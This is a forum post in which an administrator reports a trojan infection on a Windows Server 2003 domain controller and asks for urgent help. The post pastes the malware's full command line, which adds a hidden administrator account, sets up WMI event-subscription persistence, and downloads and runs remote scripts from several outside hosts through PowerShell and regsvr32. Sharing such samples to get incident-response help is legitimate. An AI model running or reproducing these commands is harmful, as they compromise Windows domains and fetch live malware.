Guys, i am in need of an urgent help. Our domain controller have been attacked by some trojan. Following script has runned on the server as a service, i have disabled the script but i guess the services has already polluted the computer:
Информация
cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators admin$ /ad&net1 localgroup administradores admin$ /ad&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm3" DELETE&wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckyoumm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAd ABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB 3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnA GgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4 AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAK QAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAA lAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbA C0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGw AZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AO wB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll®svr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll®svr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll"&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="fuckyoumm3"", Consumer="CommandLineEventConsumer.Name="fuckyoumm 4""&start regsvr32 /s /u /n /i:http://173.208.172.202:8888\s1.txt scrobj.dll
Now Our primary domain is not able to connect with additionall domain controller.
This virus is automatically changing the DNS.
We are not able to access our domain controllers through run command, however, we are able to access it through remote desktop.
Due to this trojan, users in the domain are not able to login to their laptops.
URGENT help is needed. Our OS is windows server 2003.